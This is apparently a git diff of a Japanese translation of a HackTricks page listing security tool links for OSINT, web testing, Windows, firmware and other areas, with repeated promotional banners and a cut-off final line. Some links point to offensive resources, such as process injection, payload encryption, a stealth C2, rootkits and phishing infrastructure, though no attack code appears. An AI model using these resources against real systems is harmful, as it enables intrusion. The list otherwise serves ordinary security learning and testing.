- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,16 +1,15 @@
|
|||
```markdown
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **あなたのハッキングのコツを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -20,7 +19,7 @@
|
|||
* [https://github.com/yarox24/attack\_monitor](https://github.com/yarox24/attack\_monitor)
|
||||
* [https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/](https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/)
|
||||
* [https://github.com/ION28/BLUESPAWN](https://github.com/ION28/BLUESPAWN)
|
||||
* [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : リークされたアカウントをチェック
|
||||
* [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : 漏洩したアカウントをチェック
|
||||
* [https://github.com/rabobank-cdc/DeTTECT](https://github.com/rabobank-cdc/DeTTECT)
|
||||
|
||||
# OSINT
|
||||
|
@ -42,7 +41,7 @@
|
|||
* [https://builtwith.com/](https://builtwith.com)
|
||||
* [https://www.spiderfoot.net/](https://www.spiderfoot.net)
|
||||
* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
|
||||
* [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : 8つのサブドメイン検索ツール、sublist3r、amassなど
|
||||
* [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/sys/tools/subdomainfinder/) : 8つのサブドメインファインダーツール、sublist3r、amassなど
|
||||
|
||||
# **WEB**
|
||||
|
||||
|
@ -51,98 +50,78 @@
|
|||
* [https://github.com/hahwul/XSpear](https://github.com/hahwul/XSpear)
|
||||
* [https://github.com/BitTheByte/Monitorizer/](https://github.com/BitTheByte/Monitorizer/)
|
||||
* [https://github.com/spinkham/skipfish](https://github.com/spinkham/skipfish)
|
||||
* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : ドメイン名を非同期でブルートフォース攻撃
|
||||
* [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : サブドメインのブルートフォース攻撃
|
||||
* [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): ドメイン内のWebサーバーがアクセス可能かどうかをチェック
|
||||
* [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : サブドメインの発見
|
||||
* [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : GitHubでのサブドメインの発見
|
||||
* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : ドメイン名を非同期でブルートフォース
|
||||
* [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : サブドメインブルートフォース
|
||||
* [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): ドメイン内のウェブサーバーがアクセス可能かどうかをチェック
|
||||
* [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : サブドメイン発見
|
||||
* [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : github内のサブドメイン発見
|
||||
* [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) : 高速ポートスキャン
|
||||
* [https://github.com/Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) : WebのJSファイルからサブドメインとURLを取得
|
||||
* [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Webファイルの辞書
|
||||
* [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : ドーズンのリピータータブを避けるためのBurp拡張機能
|
||||
* [https://github.com/hakluke/hakrawler](https://github.com/hakluke/hakrawler) : アセットの取得
|
||||
* [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Googleドークス
|
||||
* [https://github.com/Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) : ウェブのJSファイルからサブドメインとURLを取得
|
||||
* [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Webファイル辞書
|
||||
* [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : 数十のリピータータブを避けるためのBurpExtension
|
||||
* [https://github.com/hakluke/hakrawler](https://github.com/hakluke/hakrawler) : アセットを取得
|
||||
* [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Google dorks
|
||||
* [https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md) : Web BugBountyチェックリスト
|
||||
* [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : ドメインのリストをオープンリダイレクトに対してチェック
|
||||
* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burpプラグイン、オフライン解析によるドメイン、サブドメイン、IPの発見
|
||||
* [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): 異なるツールのリスト
|
||||
* [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : 脆弱性(SQLi、XSS、SSTI)を見つけるためのBurpSuiteプラグイン
|
||||
* [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : オープンリダイレクションに対するドメインリストをチェック
|
||||
* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : ドメイン、サブドメイン、IPを発見するためのオフライン分析のためのBurpプラグイン
|
||||
* [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): 様々なツールのリスト
|
||||
* [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : 脆弱性を見つけるためのBurpSuiteプラグイン(SQLi, XSS, SSTI)
|
||||
* [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : post-messages関数を追跡するためのChrome拡張機能
|
||||
* [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : 自動認証テスト(クッキーを削除してリクエストを送信しようとする)
|
||||
* [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCrossは、再構築、スキャナー、および侵入/ BugBountyテストツールです。このツールは、(XSS | SSRF | CORS | SSTI | IDOR | RCE | LFI | SQLI)の脆弱性をテストするために作成されました
|
||||
* [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : 自動認証テスト(クッキーを削除してリクエストを送信してみる)
|
||||
* [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCrossは再構築、スキャン、およびペネトレーション/バグバウンティテストのためのツールです。このツールは、(XSS|SSRF|CORS|SSTI|IDOR|RCE|LFI|SQLI)の脆弱性をテストするために構築されました
|
||||
|
||||
# Windows
|
||||
|
||||
* [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : レイテラルムーブメント
|
||||
* [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : 横方向の動き
|
||||
* [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins
|
||||
* [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) ([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)): 永続性
|
||||
* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windowsプロセスインジェクション技術
|
||||
* [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : レッドチームスクリプト
|
||||
* [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : Active Directoryグループポリシーのセキュリティ関連の設定ミスを見つける。
|
||||
* [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red\_Team) : Red Teamスクリプト
|
||||
* [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : Active Directoryグループポリシーのセキュリティ関連の誤設定を見つける。
|
||||
* [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Securestringの難読化
|
||||
* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : 親PIDスプーフィング
|
||||
* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : 親PIDのスプーフィング
|
||||
* [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Powershellペイロードの暗号化
|
||||
* [https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/](https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/) : ステルスC2
|
||||
* [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : Windows Internalsに関する一連のログ
|
||||
* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : ドキュメントを開いた人を追跡する
|
||||
* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : ドキュメントを開いた人を追跡
|
||||
* [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Active Directoryチートシート
|
||||
|
||||
# Firmware
|
||||
|
||||
自動的にファームウェアを分析するための興味深いツール:
|
||||
自動でファームウェアを分析するのに良さそうなツール:
|
||||
|
||||
* [https://github.com/craigz28/firmwalker](https://github.com/craigz28/firmwalker)
|
||||
* [https://github.com/fkie-cad/FACT\_core](https://github.com/fkie-cad/FACT\_core)
|
||||
* [https://gitlab.com/bytesweep/bytesweep-go](https://gitlab.com/bytesweep/bytesweep-go)
|
||||
|
||||
クリームの後:
|
||||
ポストクリーム:
|
||||
|
||||
* [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
|
||||
* [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
|
||||
|
||||
オンラインでファームウェアを見つけられない場合のファームウェアの抽出方法:[https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
|
||||
オンラインで見つからない場合のファームウェアの抽出方法: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
|
||||
|
||||
分析するための脆弱性を持つファームウェア:[https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
|
||||
こちらは分析用の脆弱性を持つファームウェア: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
|
||||
|
||||
およびファームウェアを分析するためのOWASPメソドロジー:[https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
|
||||
そしてこちらはファームウェアを分析するためのOWASPの方法論: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
|
||||
|
||||
ファームウェアエミュレーション:FIRMADYNE(https://github.com/firmadyne/firmadyne/)は、Linuxベースのファームウェアのエミュレーションと動的解析を自動化するためのプラットフォームです。
|
||||
ファームウェアエミュレーション: FIRMADYNE (https://github.com/firmadyne/firmadyne/) はLinuxベースのファームウェアのエミュレーションと動的分析を自動化するプラットフォームです。
|
||||
|
||||
# その他
|
||||
# OTHER
|
||||
|
||||
* [https://twitter.com/HackAndDo/status/1202695084543791117](https://twitter.com/HackAndDo/status/1202695084543791117)
|
||||
* [https://github.com/weev3/LKWA](https://github.com/weev3/LKWA)
|
||||
* [https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/](https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/)
|
||||
* [https://github.com/skelsec/jackdaw](https://github.com/skelsec/jackdaw)
|
||||
* [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : 静的コード解析
|
||||
* [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : 静的コード分析
|
||||
* [https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html](https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html) : Bluetooth LE CTF
|
||||
* [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : 無限のバナーをゆっくりと送信するSSHターピット。
|
||||
* AWSおよびクラウドツール:[https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
|
||||
* フィッシングのためのIFS(Interplanetary File System):[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
|
||||
* IPローテーションサービス:[https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
|
||||
* Linuxルートキット:[https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
|
||||
* [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : エンドレスバナーをゆっくりと送信するSSHターピット。
|
||||
* AWSとクラウドツール: [https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
|
||||
* IFS (Interplanetary File System) for phising: [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
|
||||
* IPローテーションサービス: [https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
|
||||
* Linux rootkit: [https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
|
||||
* [https://theia-ide.org/](https://theia-ide.org) : オンラインIDE
|
||||
* [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : バグバウンティの始め方に関するリソース
|
||||
* [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : iOSアプリケーションのペネトレーションテストツール
|
||||
* [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : BugBountiesを始めるためのリソース
|
||||
* [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : IOSペネトレーションテストツール
|
||||
* [https://github.com/random-robbie/keywords/blob/master/keywords.txt](https://github.com/random-robbie/keywords/blob/master/keywords.txt) : キーワード
|
||||
* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : IoTのハッキング(Wifi、BLE、SSDP、MDNS)
|
||||
* [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : スキャンの自動化
|
||||
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : このリストはElectron.jsのセキュリティ関連のトピックをカバーしています。
|
||||
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : BBプログラムに関する情報
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? HackTricksであなたの**企業を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
|
||||
- [**公式のPEASS&HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
|
||||
</details>
|
||||
* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomeP
|
||||
|
|
Loading…
Reference in a new issue